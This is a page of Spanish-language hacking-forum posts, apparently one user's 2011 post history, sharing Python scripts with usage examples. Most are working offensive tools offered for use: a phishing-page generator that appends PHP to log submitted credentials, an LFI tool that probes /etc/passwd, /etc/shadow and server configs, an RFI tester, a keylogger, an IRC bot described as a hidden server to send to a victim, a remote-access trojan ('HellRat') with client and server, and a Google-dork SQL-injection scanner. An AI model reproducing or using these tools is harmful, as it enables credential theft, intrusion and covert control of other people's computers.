elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


  Mostrar Mensajes
Páginas: 1 ... 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 [52] 53 54 55
511  Programación / Scripting / [Python] RFI Tester en: 7 Octubre 2011, 01:39 am
Hola a todos.

Acabo de hacer un simple verificador de vulnerabilidad RFI

Código
  1. #!usr/bin/python
  2. #RFI Tester (C) Doddy Hackman
  3.  
  4. import os,sys,urllib2,re
  5.  
  6. def header() :
  7. print "\n--== RFI Tester ==--\n"
  8.  
  9. def copyright() :
  10. print "\n\n(C) Doddy Hackman 2010\n"
  11. exit(1)
  12.  
  13. def show() :
  14. print "\n[*] Sintax : ",sys.argv[0]," <web>\n"
  15.  
  16. def toma(web) :
  17. return urllib2.urlopen(web).read()
  18.  
  19. def test(web):
  20. try:
  21.  print "\n[+] Testing vulnerability RFI in",web
  22.  code = toma(web+"http://www.supertangas.com")
  23.  if(re.findall("Los mejores TANGAS de la red",code,re.I)):
  24.   print "[+] RFI Detected"
  25.  else:
  26.   print "[-] RFI Not Found"
  27. except:
  28.  pass
  29.  
  30. header()
  31.  
  32. if len(sys.argv) != 2 :
  33. show()
  34.  
  35. else :
  36. test(sys.argv[1])
  37.  
  38. copyright()
  39.  
  40.  
  41. #The End
  42.  

Ejemplo de uso

Código:
python rfi.py http://127.0.0.1/rfi.php?index=

Código:
C:\Users\DoddyH\Desktop\Arsenal X parte 2>rfi.py http://127.0.0.1/rfi.php?index=

--== RFI Tester ==--


[+] Testing vulnerability RFI in http://127.0.0.1/rfi.php?index=
[+] RFI Detected

(C) Doddy Hackman 2010

512  Programación / Scripting / [Python] Phising Gen By Doddy H en: 7 Octubre 2011, 01:39 am
Hola a todos

Acabo de terminar esta tool en python para generar los fakes o phising (si es que asi se escribe)
No me dedico mucho a esa parte del hacking , pero hice esta cosa rara porque no
tenia nada que hacer xDD.


Código
  1. #!usr/bin/python
  2. #Phising Gen (C) Doddy Hackman
  3.  
  4. import urllib2,sys,os
  5.  
  6.  
  7. def savefile(filename,text):
  8. file = open(filename,"w")
  9. file.write(text)
  10.  
  11.  
  12. def header() :
  13. print "\n\n--== Phising Gen ==--\n"
  14.  
  15. def copyright() :
  16. print "\n\n(C) Doddy Hackman 2010\n"
  17. exit(1)
  18.  
  19. def show() :
  20. print "\n[*] Sintax : ",sys.argv[0]," <web> <filename>\n"
  21.  
  22. def toma(web) :
  23. return urllib2.urlopen(web).read()
  24.  
  25.  
  26. def gen(web,new):
  27. try:
  28.  print "\n[+] Working in the phishing"
  29.  code = toma(web)
  30.  text ='<?php $file = fopen("dump.txt", "a");foreach($_POST as $uno => $dos) {fwrite($file, $uno."=".$dos."\r\n");}foreach($_GET as $tres => $cuatro) {fwrite($file, $tres."=".$cuatro."\r\n");}fclose($file);?>'
  31.  print "[+] The fake was save in",new
  32.  savefile(new,code+"\n\n"+text)
  33. except:
  34.  pass
  35.  
  36. header()
  37.  
  38. if len(sys.argv) != 3 :
  39. show()
  40.  
  41. else :
  42. gen(sys.argv[1],sys.argv[2])
  43.  
  44. copyright()
  45.  
  46. #The End
  47.  
  48.  
  49.  

Ejemplo de uso

Código:
C:/Users/DoddyH/Desktop/Arsenal X parte 2>phising.py http://127.0.0.1/login.php
yeah.php



--== Phising Gen ==--


[+] Working in the phishing
[+] The fake was save in yeah.php


(C) Doddy Hackman 2010


513  Programación / Scripting / [Python] LFI T00l en: 7 Octubre 2011, 01:38 am
Hola a todos.

Acabo de terminar una tool para testear una vulnerabilidad LFI , si la pagina
es vulnerable entonces el script automaticamente intenta brutear archivos.

Código
  1. #!usr/bin/perl
  2. #LFI T00l (C) Doddy Hackman
  3.  
  4. import os,sys,urllib2,re
  5.  
  6. files = ['../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']
  7.  
  8. def header() :
  9. print "\n--== LFI T00l ==--\n"
  10.  
  11. def copyright() :
  12. print "\n\n(C) Doddy Hackman 2010\n"
  13. exit(1)
  14.  
  15. def show() :
  16. print "\n[*] Sintax : ",sys.argv[0]," <web>\n"
  17.  
  18. def toma(web) :
  19. return urllib2.urlopen(web).read()
  20.  
  21.  
  22. def fuzz(web):
  23. print "\n[+] Fuzzing files...\n"
  24. for file in files:
  25.  code = toma(web+file)
  26.  if not (re.findall("No such file or directory in",code)):
  27.   print "[File Found] : ",web,file
  28.  
  29.  
  30.  
  31. def test(web):
  32. try:
  33.  print "\n[+] Testing vulnerability LFI in",web
  34.  code = toma(web+"'")
  35.  if(re.findall("No such file or directory in <b>(.*?)<\/b> on line",code,re.I)):
  36.   fpd = re.findall("No such file or directory in <b>(.*?)<\/b> on line",code,re.I)
  37.   print "\n[+] LFI Detected"
  38.   print "[+] Full Path discloure : ",fpd[0]
  39.   fuzz(web)
  40.  else:
  41.   print "[-] LFI Not Found"
  42. except:
  43.  pass
  44.  
  45. header()
  46.  
  47. if len(sys.argv) != 2 :
  48. show()
  49.  
  50. else :
  51. test(sys.argv[1])
  52.  
  53. copyright()
  54.  
  55.  
  56. #The End
  57.  
Ejemplo de uso

Código:
python lfi.py http://127.0.0.1/lfi.php?file=

Código:
C:\Users\DoddyH\Desktop\Arsenal X parte 2>lfi.py http://127.0.0.1/lfi.php?file=

--== LFI T00l ==--


[+] Testing vulnerability LFI in http://127.0.0.1/lfi.php?file=

[+] LFI Detected
[+] Full Path discloure :  C:\xampp\htdocs\lfi.php

[+] Fuzzing files...



(C) Doddy Hackman 2010

514  Programación / Scripting / [Python] Simple Keylogger en: 7 Octubre 2011, 01:38 am
Un simple keylogger en Python

Código
  1. #!usr/bin/python
  2. #Simple Keylogger in Python
  3. #(C) Doddy Hackman 2011
  4.  
  5. import pyHook,pythoncom
  6.  
  7.  
  8. def savefile(name,text):
  9. file = open(name,"a")
  10. file.write(text+"\n")
  11. file.close()
  12.  
  13. def toma(frase):
  14. savefile("logs.txt",frase.Key)
  15.  
  16. def capturar():
  17. nave = pyHook.HookManager()
  18. nave.KeyDown = toma
  19. nave.HookKeyboard()
  20. pythoncom.PumpMessages()
  21.  
  22. while 1:
  23. capturar()
  24.  
  25. # The End
515  Programación / Scripting / [Python] IRC Bot en: 7 Octubre 2011, 01:37 am
Hola a todos.

Aca les traigo un IRC Bot en Python para poder usar como servidor oculto y mandarselo
a una victima para poder controlarla desde un comando canal IRC

El comando clave para mandar comandos que despues se muestra el
resultado de comando en el chat es

Código:
cmdnow TUCOMANDO

Código
  1. #!usr/bin/python
  2. #Insane Bot (C) Doddy Hackman 2011
  3. #Version beta 0.00001
  4.  
  5. import re,socket
  6. import subprocess
  7.  
  8. host = "127.0.0.1"
  9. canal = "#locos"
  10. nick = "bot"
  11.  
  12. irc = socket.socket()
  13. try:
  14. irc.connect((host,6667))
  15. irc.send("NICK "+nick+"\r\n")
  16. irc.send("USER "+nick+" 1 1 1 1\r\n")
  17. irc.send("JOIN "+canal+"\r\n")
  18. print "[+] Insane Bot Online\n"
  19. while 1:
  20.  code = irc.recv(9999)
  21.  if re.findall("PING",code):
  22.   irc.send("PONG "+code.split()[1]+"\r\n")
  23.  if re.findall("PRIVMSG",code):
  24.   nick = code.split("!")
  25.   nick = nick[0].replace(":","")
  26.   msg = code.split(":")[2:][0]
  27.   if re.findall("cmdnow",code):
  28.    cmd = code.split("cmdnow")[1]
  29.    irc.send("PRIVMSG "+canal+" : [+] Loading command : "+cmd+"\n")
  30.    rea = subprocess.Popen(cmd,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
  31.    if rea:
  32.     re1 = rea.stdout.read()
  33.     total = re1.replace("\n","|")
  34.     irc.send("PRIVMSG "+canal+" : "+total+"\n")
  35.    else:
  36.     re2 = rea.stderr.read()
  37.     total = re2.replace("\n","|")
  38.     irc.send("PRIVMSG "+canal+" : "+total+"\n")
  39.  
  40.  
  41. except:
  42. print "\n\n[-] Error\n\n"
  43.  
  44.  
  45. # The End
  46.  
516  Programación / Scripting / [Python] HTTP Console By Doddy H en: 7 Octubre 2011, 01:37 am
Bueno , este es un simple programa en python hecho en tk que permite mandar
peticiones webs a un servidor en concreto


Código
  1. #!usr/bin/python
  2. #Console (C) Doddy Hackman 2011
  3.  
  4. from Tkinter import *
  5. import socket
  6.  
  7. global x,socket
  8.  
  9. def execa() :
  10.  
  11.  
  12. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  13. s.connect((str(host.get()),80))
  14. s.send(cmd.get()+"\r\n")
  15. data = s.recv(666)
  16. s.close()
  17. panel.insert(END,repr(data))
  18.  
  19.  
  20.  
  21. window = Tk()
  22. window.title("HTTP Console (C) Doddy Hackman 2011")
  23.  
  24. window.maxsize(width="400",height="350")
  25. window.minsize(width="400",height="350")
  26.  
  27. window.configure(background="black")
  28. window.configure(cursor="tcross")
  29.  
  30. host = StringVar()
  31. cmd = StringVar()
  32.  
  33. panel = Text(window,width=30,height=15,bg="black",fg="red")
  34.  
  35. Label(window,bg="black").grid(row=3)
  36.  
  37. Label(window,text="Host : ",bg="black",fg="red").grid(row=4,column=4)
  38. entry = Entry(window,width=35,textvariable=host,bg="black",fg="red").grid(row=4,column=5)
  39.  
  40. Label(window,text="Command : ",bg="black",fg="red").grid(row=8,column=4)
  41. entry = Entry(window,width=35,textvariable=cmd,bg="black",fg="red").grid(row=8,column=5)
  42.  
  43. Button(text="Cargar",bg="black",fg="red",activebackground="red",command=execa).grid(row=8,column=9)
  44.  
  45.  
  46. Label(window,bg="black").grid(row=19)
  47. panel.grid(row=20,column=5)
  48.  
  49.  
  50. window.mainloop()
  51.  

517  Programación / Scripting / [Python] HellRat By Doddy H en: 7 Octubre 2011, 01:37 am
Hola , aca traigo un troyano en python con las siguientes
opciones

  • Ocultar inicio
  • Mostrar inicio
  • Ocultar barra de tereas
  • Mostrar barra de tareas
  • Abrir CD
  • Cerrar CD
  • Ejecutar comandos
  • Mostrar informacion

server.py

Código
  1. #!usr/bin/python
  2. #Hell RAt (C) Doddy Hackman 2011
  3.  
  4. import socket,os,re,win32api,win32gui,win32con,ctypes,subprocess
  5.  
  6. print "\n\n[+] Online\n\n"
  7.  
  8. slave = socket.socket()
  9. slave.bind(("",666))
  10. slave.listen(999)
  11.  
  12. a,b = slave.accept()
  13.  
  14. while True:
  15. rex = a.recv(20)
  16. if re.findall("getso",rex):
  17.  z = os.name
  18.  a.send(z)
  19. if re.findall("getpath",rex):
  20.  h = os.getcwd()
  21.  a.send(h)
  22. if re.findall("ocultarinicio",rex):
  23.  x = win32gui.FindWindow("Shell_TrayWnd","")
  24.  win32gui.ShowWindow(x,win32con.SW_HIDE)
  25. elif re.findall("mostrarinicio",rex):
  26.  x = win32gui.FindWindow("Shell_TrayWnd","")
  27.  win32gui.ShowWindow(x,win32con.SW_SHOWNORMAL)
  28. elif re.findall("ocultaricono",rex):
  29.  x = win32gui.FindWindow(0,"Program Manager")
  30.  win32gui.ShowWindow(x,win32con.SW_HIDE)
  31. elif re.findall("mostraricono",rex):
  32.  x = win32gui.FindWindow(0,"Program Manager")
  33.  win32gui.ShowWindow(x,win32con.SW_SHOWNORMAL)
  34. elif re.findall("abrircd",rex):
  35.  ctypes.windll.WINMM.mciSendStringW(u"set cdaudio door open", None, 0, None)
  36. elif re.findall("cerrarcd",rex):
  37.  ctypes.windll.WINMM.mciSendStringW(u"set cdaudio door closed", None, 0, None)
  38. else:
  39.  rea = subprocess.Popen(rex,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
  40.  if re:
  41.   a.send(rea.stdout.read())
  42.  else:
  43.   a.send(rea.stderr.read())
  44.  
  45.  
  46. # The End  

cliente.py

Código
  1. #!usr/bin/python
  2. #HellRat (C) Doddy Hackman 2011
  3.  
  4. import os,socket,sys
  5.  
  6. def head():
  7. print "\n\n-- == hELLrAT == --\n\n"
  8.  
  9. def copyright():
  10. print "\n\n(C) Doddy Hackman 2011\n\n"
  11.  
  12. def clean():
  13. if sys.platform=="win32":
  14.  os.system("cls")
  15. else:
  16.  os.system("clear")
  17.  
  18. def men():
  19.  
  20. try:
  21.  ip = raw_input("[+] IP : ")
  22.  client = socket.socket()
  23.  client.connect((ip,666))
  24.  while True:
  25.   clean()
  26.   print "\n\n[+] Welcome to ",ip,"\n\n"
  27.   print "\n\n[1] Informacion"
  28.   print "[2] CMD"
  29.   print "[3] Abrir CD"
  30.   print "[4] Cerrar CD"
  31.   print "[5] Ocultar iconos"
  32.   print "[6] Mostrar iconos"
  33.   print "[7] Ocultar barra de tareas"
  34.   print "[8] Mostrar barra de tareas"
  35.   print "[9] Cambiar IP"
  36.   print "[10] Salir"
  37.   op = input("\n\n[Opcion] : ")
  38.   if op == 1:
  39.    print "\n\n[+] Informacion\n\n"
  40.    client.send("getso")
  41.    so = client.recv(999)
  42.    client.send("getpath")
  43.    path = client.recv(999)
  44.    print "[+] SO : "+so  
  45.    print "[+] Path : "+path
  46.    raw_input()
  47.   if op == 2:
  48.    cmd = raw_input("\n[CMD] : ")
  49.    client.send(cmd)
  50.    code = client.recv(999)
  51.    print code
  52.    raw_input()
  53.   if op == 3:
  54.    client.send("abrircd")
  55.   if op == 4:
  56.    client.send("cerrarcd")
  57.   if op == 5:
  58.    client.send("ocultaricono")
  59.   if op == 6:
  60.    client.send("mostraricono")
  61.   if op == 7:
  62.    client.send("ocultarinicio")
  63.   if op == 8:
  64.    client.send("mostrarinicio")
  65.   if op == 9:
  66.    men()
  67.   if op == 10:
  68.    client.close()
  69.    copyright()
  70.    raw_input()
  71.    sys.exit(1)
  72. except:
  73.  print "\n\n[-] Error\n\n"
  74. head()
  75. men()
  76.  
  77. # The End
  78.  
518  Programación / Scripting / [Python] Google Inyector By dODDY h en: 7 Octubre 2011, 01:36 am
Bueno , acabo de hacer un scanner de sqli.

Este busca en google paginas con un dork marcado por ustedes
, para despues borrar repetidos y scanear las webs encontradas



Código
  1. #!usr/bin/python
  2. #Google Iny (C) Doddy Hackman 2011
  3.  
  4.  
  5. import urllib2,re,os,sys
  6.  
  7.  
  8. def head():
  9. print "\n\n -- == Google Iny == --\n"
  10.  
  11. def copyright():
  12. print "\n(C) Doddy Hackman 2011\n"
  13. sys.exit(1)
  14.  
  15.  
  16. def toma(web) :
  17. nave = urllib2.Request(web)
  18. nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
  19. op = urllib2.build_opener()
  20. return op.open(nave).read()
  21.  
  22.  
  23. def show():
  24. print "\n[+] Sintax : ",sys.argv[0]," <dork> <count>\n"
  25.  
  26. def limpiar(pag):
  27.  
  28. limpia = []
  29. for p in pag:
  30.  if not (re.findall("http://www.google.com.ar",p,re.I)):
  31.   if p not in limpia:
  32.    limpia.append(p)
  33. return limpia
  34.  
  35.  
  36. def sql(webs):
  37. for web in webs :
  38.  if re.findall("=",web):
  39.   web = re.split("=",web)
  40.   web = web[0]+"="
  41.   try:
  42.    code = toma(web+"-1+union+select+1--")
  43.    if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
  44.     print "[SQLI] : ",web,"\n"
  45.   except:
  46.    pass
  47.  
  48. def scan(dork,count):
  49. pag = []
  50. s = 10  
  51. while s <= int(count):
  52.  try:
  53.   code = toma("http://www.google.com.ar/search?hl=&q="+str(dork)+"&start="+repr(s))
  54.   d = re.findall("(?<=\"r\"><. href=\")[^\"]+",code)
  55.   s += 10
  56.   for a in d:
  57.    pag.append(a)
  58.  except:
  59.   copyright()
  60. pag = limpiar(pag)
  61.  
  62. return pag
  63.  
  64. head()
  65.  
  66. if len(sys.argv) != 3:
  67. show()
  68. else :
  69. print "\n[+] SQL Scan Started\n"
  70. print "[+] Dork : ",sys.argv[1]
  71. print "[+] Count : ",sys.argv[2]
  72. pages = scan(sys.argv[1],sys.argv[2])
  73. print "\n[+] Webs Found : ",len(pages),"\n"
  74. sql(pages)
  75.  
  76. copyright()
  77.  
519  Programación / Scripting / [Python] Fuzz DNS By Doddy H en: 7 Octubre 2011, 01:34 am
Hola a todos.

Aca les dejo un simple buscador de dns , solo ponen el dominio y esta cosita se encarga de buscarlas.


Código
  1. #!usr/bin/python
  2. #LFI T00l (C) Doddy Hackman
  3.  
  4. import os,sys,urllib2,re
  5.  
  6. dns = ['www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc']
  7.  
  8. def header() :
  9. print "\n--== Fuzz DNS ==--\n"
  10.  
  11. def copyright() :
  12. print "\n\n(C) Doddy Hackman 2010\n"
  13. exit(1)
  14.  
  15. def show() :
  16. print "\n[*] Sintax : ",sys.argv[0]," <web>\n"
  17.  
  18. def toma(web) :
  19. return urllib2.urlopen(web).read()
  20.  
  21.  
  22. def search(web):
  23. print "\n[+] Searching DNS in",web,"\n"
  24. try:
  25.  for d in dns:
  26.   toma("http://"+d+"."+web)
  27.   print "[DNS Link] : http://"+d+"."+web
  28. except:
  29.  pass
  30.  
  31. header()
  32.  
  33. if len(sys.argv) != 2 :
  34. show()
  35.  
  36. else :
  37. search(sys.argv[1])
  38.  
  39. copyright()
  40.  
  41.  
  42. #The End
  43.  

Ejemplo de uso


Código:
C:/Users/dODDYh/Desktop/Arsenal X parte 2>fuzzdns.py google.com


--== Fuzz DNS ==--


[+] Searching DNS in google.com

[DNS Link] : http://www.google.com

(C) Doddy Hackman 2010




520  Programación / Scripting / [Python] FTP Manager en: 7 Octubre 2011, 01:34 am
Hola

Aca traigo un simple cliente FTP

Código
  1. #!usr/bin/python
  2. #FTP Manager 0.2 (C) Doddy Hackman 20111
  3.  
  4. from ftplib import FTP
  5. import sys
  6.  
  7.  
  8. def head():
  9. print "\n -- == FTP Manger == --\n\n"
  10.  
  11. def copyright():
  12. print "\n\n(C) Doddy Hackman 2011\n"
  13. sys.exit(1)
  14.  
  15. def show():
  16. print "\nSintax : "+sys.argv[0]+" <host> <user> <pass>\n"
  17.  
  18. def menu():
  19. print "\n"
  20. print "1 : dir"
  21. print "2 : cwd"
  22. print "3 : chdir"
  23. print "4 : delete dir"
  24. print "5 : delete file"
  25. print "6 : rename file"
  26. print "7 : make directory"
  27. print "8 : size"
  28. print "9 : abort\n\n"
  29. op = input("[Option] : ")
  30. return op
  31.  
  32.  
  33. def enter(host,user,password):
  34. print "[+] Connecting to ",host,"\n"
  35. enter = FTP(host,user,password)
  36. print "\n[+] Enter in the system\n"
  37.  
  38. def menu2():
  39.  op = menu()
  40.  if op == 1:
  41.   try:
  42.    lista = enter.dir()
  43.    for a in lista:
  44.     print a
  45.    menu2()
  46.   except:
  47.    menu2()
  48.  elif op == 2:
  49.   try:
  50.    print "\n\n[+] Path : "+enter.pwd()+"\n\n"
  51.    menu2()
  52.   except:
  53.    menu2()
  54.  elif op == 3:
  55.   try:
  56.    dir = raw_input("\n\n[Directory] : ")
  57.    enter.cwd(dir)
  58.    print "\n\n[+] Directory Changed\n\n"
  59.    menu2()
  60.   except:
  61.    menu2()
  62.  elif op == 4:
  63.   try:
  64.    dir = raw_input("\n\n[Directory] : ")
  65.    enter.rmd(dir)
  66.    print "\n\n[+] Directory Deleted\n\n"
  67.    menu2()
  68.   except:
  69.    menu2()
  70.  elif op == 5:
  71.   try:
  72.    file = raw_input("\n\n[File] : ")
  73.    enter.delete(file)
  74.    print "\n\n[+] File Deleted\n\n"
  75.    menu2()
  76.   except:
  77.    menu2()
  78.  elif op == 6:
  79.   try:
  80.    oldfile = raw_input("\n\n[Name] : ")
  81.    newfile = raw_input("\n[New Name] : ")
  82.    enter.rename(oldfile,newfile)
  83.    print "\n\n[+] Name Changed\n\n"
  84.    menu2()
  85.   except:
  86.    menu2()
  87.  elif op == 7:
  88.   try:
  89.    dir = raw_input("\n\n[New Directory] : ")
  90.    enter.mkd(dir)
  91.    print "\n\n[+] Directory Created\n\n"
  92.    menu2()
  93.   except:
  94.    menu2()
  95.  elif op == 8:
  96.   try:
  97.    file = raw_input("\n\n[File] : ")
  98.    peso = enter.size(file)
  99.    print "\n\n[+] ",peso," KB \n\n"
  100.    menu2()
  101.   except:
  102.    menu2()
  103.  elif op == 9:
  104.   enter.quit()
  105.   copyright()
  106.  
  107.  else:
  108.   menu2()      
  109. menu2()
  110.  
  111.  
  112.  
  113. head()
  114.  
  115. if len(sys.argv) != 4:
  116. show()
  117. else:
  118. enter(sys.argv[1],sys.argv[2],sys.argv[3])
  119.  
  120. copyright()
  121.  
Páginas: 1 ... 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 [52] 53 54 55
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines